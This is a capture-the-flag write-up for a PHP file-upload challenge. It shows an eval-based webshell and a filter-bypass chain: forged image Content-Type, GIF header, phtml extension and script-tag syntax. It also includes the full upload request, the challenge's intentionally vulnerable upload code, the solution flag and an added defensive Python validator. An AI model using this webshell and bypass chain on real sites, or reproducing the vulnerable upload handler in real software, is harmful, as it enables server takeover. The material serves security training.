BUUCTF Challenge 13 -- [极客大挑战 2019]Upload

Uploading the one-liner webshell directly returns "no image".

Edit the request in Burp: set the part's Content-Type to image/gif and prepend a GIF header to the body:

Content-Type: image/gif

GIF89a<?php @eval($_POST['x']);?>
The modified request:

POST /upload_file.php HTTP/1.1
Content-Length: 310
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryf7HpKf5eD4kpm1D2
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryf7HpKf5eD4kpm1D2
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif

GIF89a<?php @eval($_POST['x']);?>
------WebKitFormBoundaryf7HpKf5eD4kpm1D2
The response is:

NOT!php!

Changing the extension to pHp also returns NOT!php! (the server lowercases the extension before comparing it).

Changing it to phtml instead returns:

NO! HACKER! your file included '<?'
So use the script-tag form of the one-liner, which contains no "<?":

<script language="php"> @eval($_POST['x'])</script>

The upload succeeds and the response is "上传文件名: 1.pHtml".
I tried appending 1.phtml directly after the port, which failed:

http://0a920cb9-e7f8-4c3c-98d8-3 ... buuoj.cn:81/1.pHtml

Changed it to:

http://0a920cb9-e7f8-4c3c-98d8-3 ... n:81/upload/1.pHtml

The connection succeeded and the flag is in the root directory:
flag{110f2373-2d3c-40b7-ad08-e286ad2dad70}
index.php:

<form action="upload_file.php" method="post" enctype="multipart/form-data">
    <div align="center">
        <label for="file" style="font:20px Georgia,serif;">图片:</label>
        <input type="file" name="file" id="file" >
        <input type="submit" name="submit" value="提交" class="button">
    </div>
</form>
upload_file.php:

<?php
$file = $_FILES["file"];
// Extensions the challenge refuses (despite the name, this array is used as a blacklist below)
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp)); // get the file extension, lowercased
$image_type = @exif_imagetype($file["tmp_name"]); // image type inferred from the file's magic bytes
if ((($file["type"] == "image/gif")
    || ($file["type"] == "image/jpeg")
    || ($file["type"] == "image/jpg")
    || ($file["type"] == "image/pjpeg")
    || ($file["type"] == "image/x-png")
    || ($file["type"] == "image/png"))
    && $file["size"] < 20480) // under 20 KB
{
    if ($file["error"] > 0) {
        echo "ERROR!!!";
    }
    elseif (in_array($extension, $allowedExts)) {
        echo "NOT!".$extension."!";
    }
    elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
        echo "NO! HACKER! your file included '<?'";
    }
    elseif (!$image_type) {
        echo "Don't lie to me, it's not image at all!!!";
    }
    else {
        // The client-supplied filename is reused unchanged as the stored name
        $fileName = './upload/'.$file['name'];
        move_uploaded_file($file['tmp_name'], $fileName);
        echo "上传文件名: " . $file["name"] . "<br>";
    }
}
else
{
    echo "Not image!";
}
?>
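As an added example (not part of the original writeup or the challenge source), here is a hardened version of the checks in upload_file.php, written in Python so the post's attempts (1.php, 1.pHp, 1.pHtml with the script-tag form) can be replayed against it offline. The function name, the allowlist and the sample bodies are my own assumptions.

```python
import re
import secrets

# Allowlist of extensions with the magic bytes the body must start with.
# upload_file.php did the opposite: a blacklist ("php", "pht", "phtm", ...)
# that silently let "phtml" through.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# upload_file.php only searched for "<?"; the post bypassed that with
# <script language="php">. Match both, case-insensitively, over the whole body.
PHP_MARKERS = re.compile(rb"<\?|<script[^>]*\blanguage\s*=\s*['\"]?php", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason_or_stored_name). The client's Content-Type is
    never consulted: it is attacker-controlled, as the Burp edit in the post shows."""
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[1].lower()   # 1.pHp / 1.pHtml normalise here
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not in allowlist"
    if not data.startswith(ALLOWED[ext]):
        return False, "body does not match the magic bytes for ." + ext
    if PHP_MARKERS.search(data):
        return False, "body contains a PHP script marker"
    # Never reuse the client's name: store under a random, server-chosen name
    # so the original filename can select neither the handler nor the path.
    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed samples taken from the post's own attempts, plus two controls.
SAMPLES = {
    "1.php": b"GIF89a<?php @eval($_POST['x']);?>",
    "1.pHp": b"GIF89a<?php @eval($_POST['x']);?>",
    "1.pHtml": b"<script language=\"php\"> @eval($_POST['x'])</script>",
    # allowed extension and valid header, but the script-tag form inside
    "cat.gif": b"GIF89a<script language=\"php\"> @eval($_POST['x'])</script>",
    "real.gif": b"GIF89a" + bytes(32),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        ok, why = validate_upload(name, body)
        print(f"{name:10} -> {'ACCEPT' if ok else 'REJECT'}: {why}")
```

Only real.gif is accepted; every attempt from the post is rejected at the extension step, and cat.gif shows that the script-tag form is caught even when the extension and header are valid.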